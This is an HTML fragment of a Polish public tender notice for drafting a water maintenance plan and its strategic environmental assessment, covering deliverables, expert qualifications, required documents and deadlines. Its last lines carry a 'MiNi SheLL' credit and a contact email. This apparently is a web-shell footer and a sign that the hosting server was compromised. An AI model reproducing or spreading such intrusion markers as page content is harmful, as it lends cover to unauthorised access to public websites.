2)	Zadanie BI - w postaci opracowania w wersji papierowej i elektronicznej - 3 egzemplarze 
w formie wydruku i 2 egzemplarze w postaci plików w formacie DOC lub DOCX Microsoft Office Word oraz PDF (na płycie CD/DVD); 
3)	Zadanie BII - w postaci opracowania w wersji papierowej i elektronicznej - 2 egzemplarze 
w formie wydruku i 2 egzemplarze w postaci plików w formacie DOC lub DOCX Microsoft Office Word oraz PDF (na płycie CD/DVD);
4)	Zadanie BIII - w postaci opracowania w wersji papierowej i elektronicznej - 2 egzemplarze 
w formie wydruku i 2 egzemplarze w postaci plików w formacie DOC lub DOCX Microsoft Office Word oraz PDF (na płycie CD/DVD) - dotyczy 2.2. CZĘŚĆ B pkt. 3) ppkt. od d. do e., oraz w postaci  raportu podsumowującego przeprowadzone spotkanie konsultacyjne - dotyczy 2.2. CZĘŚĆ B pkt. 3) ppkt. od b. do c.;
5)	Zadanie BIV - w postaci opracowania w wersji papierowej i elektronicznej -2 egzemplarze 
w formie wydruku i 2 egzemplarze w postaci plików w formacie DOC lub DOCX Microsoft Office Word oraz mapy w formacie XML i JPG lub PDF (na płycie CD/DVD).
5.2.	Wszystkie opracowania w wersji papierowej powinny zostać podpisane własnoręcznie przez wszystkich ekspertów realizujących zamówienie.
5.3.	Wykonawca zobowiązany jest do przekazania Zamawiającemu wszystkich dodatkowych dokumentów, danych i materiałów, pozyskanych i wykonanych w ramach niniejszego zamówienia. 
5.4.	Wykonawca ponad ww. ilość egzemplarzy powinien zapewnić dodatkową ilość egzemplarzy opracowań, która będzie niezbędna do przeprowadzenia przez Wykonawcę wymaganych konsultacji i uzgodnień.
5.5.	Dodatkowo wszystkie wersje elektroniczne zarówno w wersji edytowalnej oraz w plikach PDF wymienione powyżej w pkt. 5.1.1 i 5.1.2 zostaną umieszczone na zewnętrznym nośniku danych, który zostanie przekazany Zamawiającemu.

Szczegółowy opis przedmiotu zamówienia zawarty jest w Rozdziale XIV SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.71.20.00-1, 90.71.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, w tym w szczególności specjalistami o następujących kwalifikacjach: 
A.	Kierownik zespołu - który sprawował nadzór nad tworzeniem polityk lub strategii, lub planów i/bądź sprawował nadzór nad wykonaniem strategicznej oceny oddziaływania na środowisko dla tego typu dokumentów.
    Jako potwierdzenie wymaganego doświadczenia Wykonawca przedstawi w załączniku - Wykaz osób, iż ww. osoba sprawowała nadzór nad tworzeniem co najmniej dwóch dokumentów takich jak polityka lub strategia, lub plan i/lub sprawowała nadzór nad wykonaniem strategicznej oceny oddziaływania na środowisko dla tego typu dokumentów.
B.	Ekspert ds. hydrotechniki, tj. osoba posiadająca doświadczenie zawodowe w wykonawstwie bądź projektowaniu robót hydrotechnicznych, posiadająca uprawnienia do pełnienia samodzielnych funkcji w budownictwie zgodnie z wymogami ustawy z dnia 7 lipca 1994 Prawo budowlane, wraz z późniejszymi zmianami w specjalności konstrukcyjno-budowlanej  do kierowania robotami i/lub projektowaniu (lub równoważne uprawnienia hydrotechniczne wydane zgodnie z wcześniej obowiązującym prawem). 
    Jako potwierdzenie wymaganego doświadczenia Wykonawca przedstawi w załączniku - Wykaz osób, iż ww. ekspert kierował min. 3 robotami z zakresu budownictwa wodnego bądź wykonał min. 4 dokumentacje techniczne z zakresu hydrotechniki.
C. Ekspert ds. melioracji, tj. osoba posiadająca doświadczenie zawodowe w wykonawstwie bądź projektowaniu robót melioracyjnych, posiadająca uprawnienia do pełnienia samodzielnych funkcji w budownictwie zgodnie z wymogami ustawy z dnia 7 lipca 1994 Prawo budowlane, wraz z późniejszymi zmianami, w specjalności konstrukcyjno-budowlanej do kierowania robotami i/lub projektowaniu lub równoważne uprawnienia w branży melioracyjnej wydane zgodnie z wcześniej obowiązującym prawem.
Jako potwierdzenie wymaganego doświadczenia Wykonawca przedstawi w załączniku - Wykaz osób, iż ww. ekspert kierował min. 3 robotami z zakresu melioracji wodnych bądź wykonał min. 4 dokumentacje techniczne z zakresu melioracji.
D.	Ekspert ds. hydrologii i gospodarki wodnej, tj. osoba posiadająca dyplom ukończenia studiów wyższych magisterskich lub dokument ukończenia uzupełniających studiów podyplomowych, których program obejmował hydrologię lub gospodarkę wodną oraz doświadczenie zawodowe w realizacji prac dotyczących gospodarki wodnej w aspekcie ilości zasobów wodnych lub ochrony zasobów wodnych.
    Jako potwierdzenie wymaganego doświadczenia Wykonawca przedstawi w załączniku - Wykaz osób, minimum 3 prace z ww. zakresu, których ta osoba jest autorem lub współautorem, w tym co najmniej jedną pracę o charakterze naukowo-badawczym lub studialnym o zasięgu regionalnym w ww. zakresie. Wykonawca przedstawi informację o podstawie dysponowania tą osobą.
E.	Ekspert ds. ochrony środowiska, tj. osoba posiadająca dyplom ukończenia studiów wyższych 
z zakresu ochrony środowiska, posiadająca doświadczenie w zakresie sporządzania ocen oddziaływania na środowisko projektów planów, programów, strategii związanych z gospodarką wodną.
    Jako potwierdzenie wymaganego doświadczenia Wykonawca przedstawi w załączniku - Wykaz osób, minimum 3 prace z ww. zakresu, których ta osoba jest autorem lub współautorem, w tym co najmniej jedną pracę dotyczącą strategicznej oceny oddziaływania na środowisko w wymaganym zakresie. Wykonawca przedstawi informację o podstawie dysponowania tą osobą.
F.	Ekspert ds. przyrodniczych, tj. osoba posiadająca dyplom ukończenia studiów wyższych, których program obejmował biologię oraz doświadczenie zawodowe w zakresie realizacji prac dotyczących wpływu gospodarki wodnej na stan ekosystemów wodnych lub od wód zależnych. 
    Jako potwierdzenie wymaganego doświadczenia Wykonawca przedstawi w załączniku - Wykaz osób, minimum 3 prace z ww. zakresu, których ta osoba jest autorem lub współautorem, w tym co najmniej dwie prace studialne dotyczące wpływu gospodarki wodnej na stan ekosystemów wodnych lub od wód zależnych.  Wykonawca przedstawi informację o podstawie dysponowania tą osobą.
G.	Ekspert ds. kształtowania środowiska i gospodarki przestrzennej, tj. osoba posiadająca dyplom ukończenia studiów wyższych, których program obejmował planowanie zagospodarowania przestrzennego oraz doświadczenie w realizacji prac w obszarze planowania zagospodarowania przestrzennego obejmujących aspekty wymagane w Prognozie oddziaływania na środowisko projektów planów, programów, strategii itp.
    Jako potwierdzenie wymaganego doświadczenia Wykonawca przedstawi w załączniku - Wykaz osób, minimum 3 prace z ww. zakresu, których ta osoba jest autorem lub współautorem, w tym co najmniej jedną pracę o charakterze studialnym lub projektowym. Wykonawca przedstawi informację o podstawie dysponowania tą osobą.
Ocena spełnienia warunku będzie dokonana na zasadzie spełnia/nie spełnia na podstawie potwierdzających go dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Plan realizacji zamówienia - Harmonogram opracowania projektu dokumentu pn. Plan utrzymania wód obejmujący obszar Regionalnego Zarządu Gospodarki Wodnej w Szczecinie wraz z przeprowadzeniem Strategicznej Oceny Oddziaływania na Środowisko dla tego dokumentu.         
2. Odpowiednie pełnomocnictwa;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Plan realizacji zamówienia - harmonogram - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczecin.rzgw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Zarząd Gospodarki Wodnej w Szczecinie, ul. Tama Pomorzańska 13A, 70-030 Szczecin, Zespół ds. zamówień pok. nr 128..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2015 godzina 09:00, miejsce: Regionalny Zarząd Gospodarki Wodnej w Szczecinie ul. Tama Pomorzańska 13A, pok. nr 128..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com